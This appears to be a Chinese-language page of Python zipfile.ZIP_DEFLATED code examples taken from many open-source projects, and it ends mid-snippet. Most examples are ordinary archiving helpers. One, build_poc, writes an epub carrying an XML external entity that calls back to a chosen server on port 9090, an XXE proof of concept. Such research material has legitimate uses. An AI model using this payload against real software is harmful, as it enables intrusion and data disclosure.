Python zipfile 模块,ZIP_DEFLATED 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用zipfile.ZIP_DEFLATED

项目:AutoML5    作者:djajetic    | 项目源码 | 文件源码
def zipdir(archivename, basedir):
    '''Zip the files below ``basedir`` into ``archivename``.

    Adapted from J.F. Sebastian, http://stackoverflow.com/

    Every file is stored under its path relative to ``basedir``.  Files whose
    name ends in ``.zip`` are skipped, and empty directories are not recorded.

    :param archivename: path of the zip archive to create (overwritten).
    :param basedir: existing directory whose files are archived.
    '''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            # NOTE: ignore empty directories
            for fn in files:
                if fn.endswith('.zip'):
                    continue
                absfn = os.path.join(root, fn)
                # relpath stays correct when basedir ends with a separator,
                # where slicing by len(basedir) would eat the first character.
                zfn = os.path.relpath(absfn, basedir)
                z.write(absfn, zfn)

# ================ Inventory input data and create data structure =================
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Load a pickled object from disk, optionally from inside a zip archive.

    Parameters
    ----------
    path: str
        path of the file to read
    compression: bool
        if true, `path` is opened as a zip archive and the pickle is read
        from its "data" member.

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can execute arbitrary code; only load trusted files.
    if not compression:
        with open(path, "rb") as raw_file:
            return pickle.load(raw_file)

    with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as archive:
        with archive.open("data") as member:
            return pickle.load(member)
项目:gimel    作者:Alephbet    | 项目源码 | 文件源码
def prepare_zip():
    """Create (or overwrite) ``gimel.zip`` in the current directory.

    The archive receives a ``config.json`` entry holding the JSON dump of
    ``config``, the ``config.py``, ``gimel.py`` and ``logger.py`` resources of
    the ``gimel`` package, and every file found below its ``vendor``
    resource directory.
    """
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
        # config.json is written from memory with explicit 0o664 mode bits
        config_entry = ZipInfo('config.json')
        config_entry.external_attr = 0o664 << 16
        zipf.writestr(config_entry, dumps(config))
        for module_name in ('config.py', 'gimel.py', 'logger.py'):
            zipf.write(resource('gimel', module_name), module_name)
        for folder, _subdirs, names in os.walk(resource('gimel', 'vendor')):
            for name in names:
                on_disk = os.path.join(folder, name)
                # vendored files keep their path relative to the package root
                in_archive = os.path.relpath(on_disk, resource('gimel', ''))
                zipf.write(on_disk, in_archive)
项目:pyseeder    作者:PurpleI2P    | 项目源码 | 文件源码
def reseed(self, netdb):
        """Zip ``.dat`` files found below ``netdb`` and store them as content.

        At most 75 files are packed; when more are found, 75 are picked at
        random.  The zip bytes end up in ``self.CONTENT`` together with the
        matching ``FILE_TYPE``, ``CONTENT_TYPE`` and ``CONTENT_LENGTH`` fields.

        Raises PyseederException when no ``.dat`` file is found.
        """
        # TODO check modified time
        # may be not older than 10h
        candidates = [
            os.path.join(folder, name)
            for folder, _subdirs, names in os.walk(netdb)
            for name in names
            if name.endswith(".dat")
        ]

        if not candidates:
            raise PyseederException("Can't get enough netDb entries")
        if len(candidates) > 75:
            candidates = random.sample(candidates, 75)

        buffer = io.BytesIO()
        with ZipFile(buffer, "w", compression=ZIP_DEFLATED) as zf:
            for entry in candidates:
                # entries are stored flat, by file name only
                zf.write(entry, arcname=os.path.basename(entry))

        payload = buffer.getvalue()
        self.FILE_TYPE = 0x00
        self.CONTENT_TYPE = 0x03
        self.CONTENT = payload
        self.CONTENT_LENGTH = len(payload)
项目:albt    作者:geothird    | 项目源码 | 文件源码
def __zip_function__(self):
        """
        Zip source code

        Writes ``self.zip_name`` inside ``self.path``.  The archive receives
        the contents of the virtual environment (if ``self.virtual_env`` is
        set), each entry of ``self.libraries`` and finally the function file
        ``self.function``.
        :return:
        """
        archive_path = os.path.join(self.path, self.zip_name)
        PrintMsg.cmd('{}'.format(archive_path), 'ARCHIVING')
        # The context manager closes the archive even when adding a file fails.
        with zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
            if self.virtual_env:
                env_path = self.virtual_env
                # Use the last 'site-packages' directory found in the walk;
                # fall back to the environment root when there is none.
                for root, dirs, files in os.walk(self.virtual_env):
                    if 'site-packages' in dirs:
                        env_path = os.path.join(root, 'site-packages')
                Lambda.zip_add_dir(env_path, zipf)
            for lib in self.libraries:
                Lambda.zip_add_dir(lib, zipf, True)
            zipf.write(os.path.join(self.path, self.function), self.function)
项目:geekcloud    作者:Mr-Linus    | 项目源码 | 文件源码
def load_full_log(self, filename, user=None, uid=None):
        """Return the stored log for ``filename``.

        The user is taken from ``user`` when it is a ``User`` instance, else
        looked up by ``uid``, else ``self.user``.  Without a user the string
        'ERROR User(None)' is returned.

        When the log record's ``logPath`` is 'locale' its ``log`` attribute is
        returned directly; otherwise ``logPath`` is opened as a zip archive
        (password ``logPWD``) and its first member is returned and cached in
        ``self._data``.  A ``KeyError`` while reading yields an error string.
        """
        if not isinstance(user, User):
            user = User.objects.get(id=uid) if uid else self.user
        if not user:
            return 'ERROR User(None)'

        if self._lists:
            self.file = self._lists.get(filename=filename)
        else:
            self.file = TermLog.objects.get(filename=filename)
        if self.file.logPath == 'locale':
            return self.file.log

        try:
            # `with` releases the file handle, which was previously leaked
            with zipfile.ZipFile(self.file.logPath, 'r', zipfile.ZIP_DEFLATED) as zf:
                zf.setpassword(self.file.logPWD)
                self._data = zf.read(zf.namelist()[0])
            return self._data
        except KeyError:
            return 'ERROR: Did not find %s file' % filename
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def ZipFiles(targetdir, ziparchivename):
    '''Create a zip archive of all files in the target directory.

    ``targetdir`` is either a directory path (walked recursively) or a list
    of file paths.  Files are stored under the path they were given with.
    After writing, the archive is re-opened and checked; a warning is printed
    when the check reports a bad member.
    '''
    #os.chdir(targetdir)
    myzip = zipfile.ZipFile(ziparchivename, "w", zipfile.ZIP_DEFLATED)
    try:
        if isinstance(targetdir, str):
            for root, dirs, files in os.walk(targetdir):
                for fname in files:
                    # NOTE(review): compares a bare file name with the archive
                    # path, so this only skips the archive when it was given
                    # as a plain file name.
                    if fname != ziparchivename:
                        myzip.write(os.path.join(root, fname))
        if isinstance(targetdir, list):
            for fname in targetdir:
                myzip.write(fname)
    finally:
        myzip.close()

    myzip = zipfile.ZipFile(ziparchivename, "r", zipfile.ZIP_DEFLATED)
    try:
        if myzip.testzip() is not None:
            # print() with one argument behaves the same on Python 2 and 3
            print("Warning: Zipfile did not pass check.")
    finally:
        myzip.close()
项目:zoocore    作者:dsparrow27    | 项目源码 | 文件源码
def createZipWithProgress(zippath, files):
    """Same as function createZip() but has a stdout progress bar which is useful for commandline work

    The directory that will hold the zip file is created when missing.

    :param zippath: the file path for the zip file
    :type zippath: str
    :param files: A Sequence of (source path, archive name) pairs that will be archived.
    :type files: seq(seq(str))
    """
    target_dir = os.path.dirname(zippath)
    # dirname is empty for a bare file name; nothing has to be created then
    # (os.makedirs("") would raise).
    if target_dir and not os.path.exists(target_dir):
        os.makedirs(target_dir)
    logger.debug("writing file: {}".format(zippath))
    length = len(files)
    progressBar = commandline.CommandProgressBar(length, prefix='Progress:', suffix='Complete', barLength=50)
    progressBar.start()
    with zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED) as archive:
        for p in files:
            logger.debug("Archiving file: {} ----> :{}\n".format(p[0], p[1]))
            archive.write(p[0], p[1])
            progressBar.increment(1)
    logger.debug("finished writing zip file to : {}".format(zippath))
项目:abusehelper    作者:Exploit-install    | 项目源码 | 文件源码
def format(self, parts, events, filename, *args):
        """Format the events, zip the result and attach it to ``parts``.

        The output of ``self.formatter.format`` is UTF-8 encoded and stored
        as the single member of an in-memory zip.  When ``filename`` already
        ends in ``.zip`` (case-insensitive) it names the attachment and the
        member is named without that extension; otherwise the attachment is
        ``filename + ".zip"`` and the member is ``filename``.

        Appends one base64-encoded ``application/zip`` part to ``parts`` and
        returns an empty unicode string.
        """
        prefix, ext = os.path.splitext(filename)
        already_zip = ext.lower() == ".zip"
        zip_name = filename if already_zip else filename + ".zip"
        raw_name = prefix if already_zip else filename

        payload = self.formatter.format(parts, events, *args)
        memfile = StringIO()
        archive = zipfile.ZipFile(memfile, 'w', zipfile.ZIP_DEFLATED)
        archive.writestr(raw_name, payload.encode("utf-8"))
        archive.close()
        memfile.flush()
        memfile.seek(0)

        attachment = MIMEBase("application", "zip")
        attachment.set_payload(memfile.read())
        encode_base64(attachment)
        attachment.add_header(
            "Content-Disposition", "attachment", filename=zip_name)
        parts.append(attachment)

        return u""
项目:hostapd-mana    作者:adde88    | 项目源码 | 文件源码
def makeZipFiles(self):
        """Create the zip fixtures in the current directory.

        Produces ``bigfile.zip`` (stored), ``littlefiles.zip`` holding 1000
        entries named ``zipstreamdir/<n>``, and ``bigfile_deflated.zip``
        (deflated), then calls ``self.cleanupUnzippedJunk()``.
        """
        self._makebigfile('bigfile.zip', zipfile.ZIP_STORED)

        small_archive = zipfile.ZipFile('littlefiles.zip', 'w')
        try:
            os.mkdir('zipstreamdir')
        except EnvironmentError:
            # best effort: presumably the directory is left from an earlier run
            pass
        for index in range(1000):
            member = 'zipstreamdir/%d' % index
            # presumably writes an empty file at `member` -- confirm in `stuff`
            stuff(member, '')
            small_archive.write(member)
        small_archive.close()

        self._makebigfile('bigfile_deflated.zip', zipfile.ZIP_DEFLATED)

        self.cleanupUnzippedJunk()
项目:scar    作者:grycap    | 项目源码 | 文件源码
def create_zip_file(self, file_name, args):
        """Build the lambda deployment zip and return its bytes.

        The supervisor script is copied to ``<file_name>.py`` in the current
        directory, zipped together with the udocker script and library
        tarball, and the temporary copy is removed again.  An optional
        ``args.script`` is added as ``init_script.sh`` and an optional
        ``args.extra_payload`` is appended through ``self.zipfolder``; both
        also set the matching entry in ``Config.lambda_env_variables``.

        :param file_name: lambda function name, without the ``.py`` suffix.
        :param args: object that may carry ``script`` and ``extra_payload``.
        :return: content of ``Config.zip_file_path`` as bytes.
        """
        # Set generic lambda function name
        function_name = file_name + '.py'
        # Copy file to avoid messing with the repo files
        # We have to rename because the function name affects the handler name
        shutil.copy(Config.dir_path + '/lambda/scarsupervisor.py', function_name)
        try:
            # Zip the function file
            with zipfile.ZipFile(Config.zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zf:
                # Lambda function code
                zf.write(function_name)
                # Udocker script code
                zf.write(Config.dir_path + '/lambda/udocker', 'udocker')
                # Udocker libs
                zf.write(Config.dir_path + '/lambda/udocker-1.1.0-RC2.tar.gz', 'udocker-1.1.0-RC2.tar.gz')
                if getattr(args, 'script', None):
                    zf.write(args.script, 'init_script.sh')
                    Config.lambda_env_variables['Variables']['INIT_SCRIPT_PATH'] = "/var/task/init_script.sh"
        finally:
            # Remove the temporary copy even when zipping fails
            os.remove(function_name)
        if getattr(args, 'extra_payload', None):
            self.zipfolder(Config.zip_file_path, args.extra_payload)
            Config.lambda_env_variables['Variables']['EXTRA_PAYLOAD'] = "/var/task/extra/"
        # Return the zip as an array of bytes
        with open(Config.zip_file_path, 'rb') as f:
            return f.read()
项目:script.skin.helper.skinbackup    作者:marcelveldt    | 项目源码 | 文件源码
def backup_theme(self, themename):
        '''Back up a colortheme to a zipfile.

        Asks for a destination folder through a browse dialog and does
        nothing when no folder is returned.  Otherwise the files belonging to
        the theme are zipped into a temporary archive, which is then copied to
        "<Skin name> ColorTheme - <themename>.zip" inside the chosen folder.

        :param themename: name of the colortheme whose files are backed up
        '''
        import zipfile
        backup_path = xbmcgui.Dialog().browse(3, self.addon.getLocalizedString(32029), "files").decode("utf-8")
        if backup_path:
            # NOTE(review): the busy dialog opened here is only closed on the
            # success path; an exception below leaves it open.
            xbmc.executebuiltin("ActivateWindow(busydialog)")
            backup_name = u"%s ColorTheme - %s" % (get_skin_name().capitalize(), themename)
            backupfile = os.path.join(backup_path, backup_name + u".zip")
            zip_temp = u'special://temp/%s.zip' % backup_name
            # remove a stale temp archive and any previous backup of that name
            xbmcvfs.delete(zip_temp)
            xbmcvfs.delete(backupfile)
            zip_temp = xbmc.translatePath(zip_temp).decode("utf-8")
            zip_file = zipfile.ZipFile(zip_temp, "w", zipfile.ZIP_DEFLATED)
            abs_src = os.path.abspath(xbmc.translatePath(self.userthemes_path).decode("utf-8"))
            for filename in xbmcvfs.listdir(self.userthemes_path)[1]:
                # a file belongs to the theme when it starts with "<themename>_"
                # or equals the theme name once ".theme"/".jpg" are removed
                if (filename.startswith("%s_" % themename) or
                        filename.replace(".theme", "").replace(".jpg", "") == themename):
                    filename = filename.decode("utf-8")
                    filepath = xbmc.translatePath(self.userthemes_path + filename).decode("utf-8")
                    absname = os.path.abspath(filepath)
                    # archive name: path relative to the themes folder
                    arcname = absname[len(abs_src) + 1:]
                    zip_file.write(absname, arcname)
            zip_file.close()
            # the archive is built in the temp location, then copied to the target
            xbmcvfs.copy(zip_temp, backupfile)
            xbmc.executebuiltin("Dialog.Close(busydialog)")
项目:combine-DT-with-NN-in-RL    作者:Burning-Bear    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Read back a pickle that may have been stored inside a zip file.

    Parameters
    ----------
    path: str
        path of the file to read
    compression: bool
        if true the file is treated as a zip archive whose "data" member
        holds the pickle; otherwise the file itself is the pickle.

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can execute arbitrary code; only load trusted files.
    if compression:
        with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as bundle, \
                bundle.open("data") as stream:
            return pickle.load(stream)

    with open(path, "rb") as stream:
        return pickle.load(stream)
项目:tecken    作者:mozilla-services    | 项目源码 | 文件源码
def run():
    """Download the configured symbol URLs and bundle them into one zip.

    Blank lines and lines starting with ``#`` in ``URLS`` are ignored.  Every
    download that produced a file is added, deflated, to
    ``symbols-for-systemtests.zip`` under its URI with ``v1/`` removed.
    """
    urls = []
    for line in URLS.strip().splitlines():
        candidate = line.strip()
        if candidate and not candidate.startswith('#'):
            urls.append(candidate)

    with tempfile.TemporaryDirectory(prefix='symbols') as tmpdirname:
        downloaded = download_all(urls, tmpdirname)
        save_filepath = 'symbols-for-systemtests.zip'
        # totals are accumulated for every download, including failed ones
        total_time_took = 0.0
        total_size = 0
        with zipfile.ZipFile(save_filepath, mode='w') as zf:
            for uri, result in downloaded.items():
                fullpath, time_took, size = result
                total_time_took += time_took
                total_size += size
                if not fullpath:
                    continue
                arcname = uri.replace('v1/', '')
                assert os.path.isfile(fullpath)
                zf.write(
                    fullpath,
                    arcname=arcname,
                    compress_type=zipfile.ZIP_DEFLATED,
                )
项目:devsecops-example-helloworld    作者:boozallen    | 项目源码 | 文件源码
def _upload(self, filename):
        """Zip ``filename``, base64-encode it and send it to the remote end.

        Returns the ``value`` of the UPLOAD_FILE command response.  When the
        remote end reports that it does not support the upload command, the
        original ``filename`` is returned instead.  Any other
        WebDriverException is re-raised.
        """
        fp = IOStream()
        with zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED) as zipped:
            zipped.write(filename, os.path.split(filename)[1])
        # base64.encodestring was removed in Python 3.9; encodebytes is its
        # replacement.  Fall back for interpreters that lack encodebytes.
        encode = getattr(base64, 'encodebytes', None) or base64.encodestring
        content = encode(fp.getvalue())
        if not isinstance(content, str):
            content = content.decode('utf-8')
        try:
            return self._execute(Command.UPLOAD_FILE,
                            {'file': content})['value']
        except WebDriverException as e:
            message = e.__str__()
            # Responses that indicate the upload command is unavailable
            unsupported_markers = (
                "Unrecognized command: POST",
                "Command not found: POST ",
                '{"status":405,"value":["GET","HEAD","DELETE"]}',
            )
            if any(marker in message for marker in unsupported_markers):
                return filename
            raise
项目:wikilinks    作者:trovdimi    | 项目源码 | 文件源码
def plaintext2zip(self, file_name, subdirname, plaintext):
        """Store ``plaintext`` as a zipped ``.txt`` file.

        The text is first written (UTF-8) to
        ``STATIC_PLAINTEXT_ARTICLES_DIR + subdirname + '/' + <name>.txt`` and
        then zipped into ``<name>.zip`` next to it, where ``<name>`` is
        ``file_name`` up to its first dot.  The intermediate ``.txt`` file is
        removed after it has been zipped.  Errors while zipping are printed
        and logged, not raised.
        """
        file_name = file_name.split('.')[0]
        target_dir = STATIC_PLAINTEXT_ARTICLES_DIR + subdirname
        plaintext_file_name = target_dir + '/' + file_name + '.txt'
        zip_file_name = target_dir + '/' + file_name + '.zip'

        if not os.path.exists(target_dir):
            os.makedirs(target_dir)

        # the context manager flushes and closes the file on exit
        with codecs.open(plaintext_file_name, 'w', encoding='utf8') as outfile:
            outfile.write(plaintext)

        zf = zipfile.ZipFile(zip_file_name, mode='w', compression=zipfile.ZIP_DEFLATED)
        try:
            zf.write(plaintext_file_name, os.path.basename(plaintext_file_name))
            os.remove(plaintext_file_name)
        except Exception as e:
            # deliberate best effort: report the failure and carry on
            print(e)
            logging.error('zip error %s ' % plaintext_file_name)
        finally:
            zf.close()
项目:KodiDevKit    作者:phil65    | 项目源码 | 文件源码
def make_archive(folderpath, archive):
    """
    Create zip with path *archive from folder with path *folderpath

    Skipped: anything with a ".git" path component, files under "media"
    that are not ".xbt", anything under "themes", and ".pyc"/".pyo"/".zip"
    files.  Each archived file is logged at warning level.
    """
    with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as bundle:
        for addon_file in get_absolute_file_paths(folderpath):
            components = re.split(r'[\\/]', addon_file)
            rel_path = os.path.relpath(addon_file, folderpath)
            # NOTE(review): the last test looks at the full path, not the
            # file name, so it only matches paths that begin with a dot.
            excluded = (
                ".git" in components
                or (rel_path.startswith("media")
                    and not rel_path.endswith(".xbt"))
                or rel_path.startswith("themes")
                or addon_file.endswith(('.pyc', '.pyo', '.zip'))
                or addon_file.startswith('.')
            )
            if excluded:
                continue
            bundle.write(addon_file, rel_path)
            logging.warning("zipped %s" % rel_path)
项目:OSPTF    作者:xSploited    | 项目源码 | 文件源码
def updateZip(zipname, filename, data):
    """Replace (or add) the member ``filename`` of archive ``zipname``.

    The archive is copied, without ``filename``, to a temporary file in the
    same directory, the temporary file then replaces the original, and
    ``filename`` is finally appended with ``data`` (deflated).  The archive
    comment is preserved.

    If the original cannot be read or copied, the temporary file is removed
    and the exception propagates; the original archive is left untouched.
    """
    # generate a temp file
    tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))
    os.close(tmpfd)

    # create a temp copy of the archive without filename
    try:
        with zipfile.ZipFile(zipname, 'r') as zin:
            with zipfile.ZipFile(tmpname, 'w') as zout:
                zout.comment = zin.comment  # preserve the comment
                for item in zin.infolist():
                    if item.filename != filename:
                        zout.writestr(item, zin.read(item.filename))
    except Exception:
        # do not leave the half-written temp copy behind
        os.remove(tmpname)
        raise

    # replace with the temp archive
    os.remove(zipname)
    os.rename(tmpname, zipname)

    # now add filename with its new data
    with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, data)
项目:rl-attack-detection    作者:yenchenlin    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Unpickle an object from `path`, decompressing it first if requested.

    Parameters
    ----------
    path: str
        path of the file to read
    compression: bool
        if true, `path` must be a zip archive; the pickle is read from the
        archive member named "data".

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can execute arbitrary code; only load trusted files.
    if not compression:
        with open(path, "rb") as source:
            loaded = pickle.load(source)
        return loaded

    with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as container:
        with container.open("data") as source:
            loaded = pickle.load(source)
    return loaded
项目:nojs    作者:chrisdickinson    | 项目源码 | 文件源码
def _ArchiveOutputDir(self):
    """Archive all files in the output dir, and return as compressed bytes."""
    with io.BytesIO() as archive:
      with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as contents:
        num_files = 0
        for absdir, _, files in os.walk(self._output_dir):
          reldir = os.path.relpath(absdir, self._output_dir)
          for filename in files:
            src_path = os.path.join(absdir, filename)
            # We use normpath to turn './file.txt' into just 'file.txt'.
            dst_path = os.path.normpath(os.path.join(reldir, filename))
            contents.write(src_path, dst_path)
            num_files += 1
      if num_files:
        logging.info('%d files in the output dir were archived.', num_files)
      else:
        logging.warning('No files in the output dir. Archive is empty.')
      return archive.getvalue()
项目:gprime    作者:GenealogyCollective    | 项目源码 | 文件源码
def _write_zip(self):
        try:
            file = zipfile.ZipFile(self.filename,"w",zipfile.ZIP_DEFLATED)
        except IOError as msg:
            errmsg = "%s\n%s" % (_("Could not create %s") % self.filename, msg)
            raise ReportError(errmsg)
        except:
            raise ReportError(_("Could not create %s") % self.filename)

        file.write(self.manifest_xml,str("META-INF/manifest.xml"))
        file.write(self.content_xml,str("content.xml"))
        file.write(self.meta_xml,str("meta.xml"))
        file.write(self.styles_xml,str("styles.xml"))
        file.write(self.mimetype,str("mimetype"))
        file.close()

        os.unlink(self.manifest_xml)
        os.unlink(self.content_xml)
        os.unlink(self.meta_xml)
        os.unlink(self.styles_xml)
项目:baselines    作者:openai    | 项目源码 | 文件源码
def pickle_load(path, compression=False):
    """Return the object pickled at `path`, which may be zip-compressed.

    Parameters
    ----------
    path: str
        path of the file to read
    compression: bool
        if true, assumes the pickle was written into a zip archive (as the
        member "data") and reads it from there.

    Returns
    -------
    obj: object
        the unpickled object
    """
    # NOTE: unpickling can execute arbitrary code; only load trusted files.
    if compression:
        zipped = zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED)
        with zipped:
            with zipped.open("data") as handle:
                return pickle.load(handle)

    with open(path, "rb") as handle:
        return pickle.load(handle)
项目:auditwheel    作者:pypa    | 项目源码 | 文件源码
def dir2zip(in_dir, zip_fname):
    """ Make a zip file `zip_fname` with contents of directory `in_dir`

    The recorded filenames are relative to `in_dir`, so doing a standard zip
    unpack of the resulting `zip_fname` in an empty directory will result in
    the original directory contents.

    Only files are recorded; empty directories are not.

    Parameters
    ----------
    in_dir : str
        Directory path containing files to go in the zip archive
    zip_fname : str
        Filename of zip archive to write
    """
    # The context manager closes the archive even if a write fails.
    with zipfile.ZipFile(zip_fname, 'w',
                         compression=zipfile.ZIP_DEFLATED) as z:
        for root, dirs, files in os.walk(in_dir):
            for name in files:
                fname = os.path.join(root, name)
                z.write(fname, os.path.relpath(fname, in_dir))
项目:aws-cfn-plex    作者:lordmuffin    | 项目源码 | 文件源码
def assemble_my_parts(self):
        """Assemble the `self.parts` dictionary.  Extend in subclasses.

        Builds the complete document as a zip archive in a temporary file and
        stores its bytes under ``parts['whole']``; ``parts['encoding']`` and
        ``parts['version']`` are filled in as well.
        """
        writers.Writer.assemble_parts(self)
        tmp = tempfile.NamedTemporaryFile()
        package = zipfile.ZipFile(tmp, 'w', zipfile.ZIP_DEFLATED)
        # 'mimetype' is written first and uncompressed
        self.write_zip_str(package, 'mimetype', self.MIME_TYPE,
            compress_type=zipfile.ZIP_STORED)
        body_xml = self.visitor.content_astext()
        self.write_zip_str(package, 'content.xml', body_xml)
        manifest_xml = self.create_manifest()
        self.write_zip_str(package, 'META-INF/manifest.xml', manifest_xml)
        meta_xml = self.create_meta()
        self.write_zip_str(package, 'meta.xml', meta_xml)
        styles_xml = self.get_stylesheet()
        self.write_zip_str(package, 'styles.xml', styles_xml)
        self.store_embedded_files(package)
        self.copy_from_stylesheet(package)
        package.close()
        # rewind and read back the finished archive
        tmp.seek(0)
        archive_bytes = tmp.read()
        tmp.close()
        self.parts['whole'] = archive_bytes
        self.parts['encoding'] = self.document.settings.output_encoding
        self.parts['version'] = docutils.__version__
项目:poc    作者:sourceincite    | 项目源码 | 文件源码
def build_poc(server):
    """Write ``poc.epub`` to the current directory.

    The file is a zip archive with a single ``META-INF/container.xml`` member
    whose external entity points at ``http://<server>:9090/``.

    :param server: host name or address substituted into the entity URL.
    """
    xxe = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
    <rootfiles>
        <rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile>
    </rootfiles>
</container>""" % server

    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    zipinfo = zipfile.ZipInfo("META-INF/container.xml")
    # 0o777 / plain int literals are valid on both Python 2.6+ and Python 3
    zipinfo.external_attr = 0o777 << 16
    z.writestr(zipinfo, xxe)
    z.close()
    with open('poc.epub', 'wb') as epub:
        epub.write(f.getvalue())
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        """Write the wheel archive at ``pathname``.

        ``archive_paths`` yields ``(archive name, source path)`` pairs; each
        source file is stored, deflated, under its archive name.
        """
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as wheel_archive:
            for entry in archive_paths:
                arcname, source = entry
                logger.debug('Wrote %s to %s in wheel', source, arcname)
                wheel_archive.write(source, arcname)
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create the zip file 'zip_filename' from all the files under
    'base_dir', using the "zipfile" module.  Members are named by their path
    below 'base_dir'.  With 'dry_run' set nothing is written; the files are
    only logged.  'compress' selects deflated or stored members and 'mode'
    is passed to ZipFile.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if not os.path.isfile(path):
                continue
            # strip "<base_dir>/" to get the archive name
            p = path[len(base_dir) + 1:]
            if not dry_run:
                z.write(path, p)
            log.debug("adding '%s'", p)

    if compress:
        compression = zipfile.ZIP_DEFLATED
    else:
        compression = zipfile.ZIP_STORED

    if dry_run:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
        return zip_filename

    z = zipfile.ZipFile(zip_filename, mode, compression=compression)
    for dirname, dirs, files in os.walk(base_dir):
        visit(z, dirname, files)
    z.close()
    return zip_filename
项目:ardy    作者:avara1986    | 项目源码 | 文件源码
def create_zip(cls, fname):
        """Create ``<fname>.zip`` holding a freshly touched ``<fname>.txt``.

        The ``.txt`` file is removed after it has been archived.  Returns the
        zip file name.
        """
        example_file, zip_file = fname + ".txt", fname + ".zip"
        touch(example_file)
        archive = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED)
        archive.write(example_file)
        archive.close()
        os.remove(example_file)
        return zip_file
项目:stalker_pyramid    作者:eoyilmaz    | 项目源码 | 文件源码
def archive(cls, path):
        """Creates a zip file containing the given directory.

        The archive is written to the system temp directory as
        ``<directory name>.zip``.  Sub-directories and files are stored under
        their path relative to the parent of ``path``.

        :param path: Path to the archived directory.
        :return: Path of the created zip file.
        """
        import zipfile
        dir_name = os.path.basename(path)
        zip_path = os.path.join(tempfile.gettempdir(), '%s.zip' % dir_name)

        # Archive names are relative to the parent directory.  relpath also
        # works when `path` has no directory part or sits directly under the
        # root, where slicing by len(parent + '/') cut off a character.
        parent_path = os.path.dirname(path) or os.curdir

        z = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED,
                            allowZip64=True)
        try:
            for current_dir_path, dir_names, file_names in os.walk(path):
                # directories first, so empty ones are recorded too
                for entry_name in dir_names + file_names:
                    entry_path = os.path.join(current_dir_path, entry_name)
                    arch_path = os.path.relpath(entry_path, parent_path)
                    z.write(entry_path, arch_path)
        finally:
            z.close()

        return zip_path
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        """Create the zip at ``pathname`` from ``archive_paths``.

        Every item of ``archive_paths`` is an ``(archive name, file path)``
        pair; the file is added, deflated, under the given archive name.
        """
        target = ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED)
        with target:
            for arcname, filepath in archive_paths:
                logger.debug('Wrote %s to %s in wheel', filepath, arcname)
                target.write(filepath, arcname)
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create the zip file 'zip_filename' from all the files under
    'base_dir', visiting directories in the order given by sorted_walk().
    Members are named by their path below 'base_dir'.  With 'dry_run' set
    nothing is written; the files are only logged.  'compress' selects
    deflated or stored members and 'mode' is passed to ZipFile.  Returns the
    name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        candidates = (
            os.path.normpath(os.path.join(dirname, name)) for name in names
        )
        for path in candidates:
            if os.path.isfile(path):
                # strip "<base_dir>/" to get the archive name
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_STORED
    if compress:
        compression = zipfile.ZIP_DEFLATED

    if dry_run:
        for dirname, dirs, files in sorted_walk(base_dir):
            visit(None, dirname, files)
    else:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in sorted_walk(base_dir):
            visit(z, dirname, files)
        z.close()
    return zip_filename
项目:python-libjuju    作者:juju    | 项目源码 | 文件源码
def make_archive(self, path):
        r"""Create archive of directory and write to ``path``.

        :param path: Path to archive

        Ignored::

            * build/\* - This is used for packing the charm itself and any
                          similar tasks.
            * \*/.\*    - Hidden files are all ignored for now.  This will most
                          likely be changed into a specific ignore list
                          (.bzr, etc)

        """
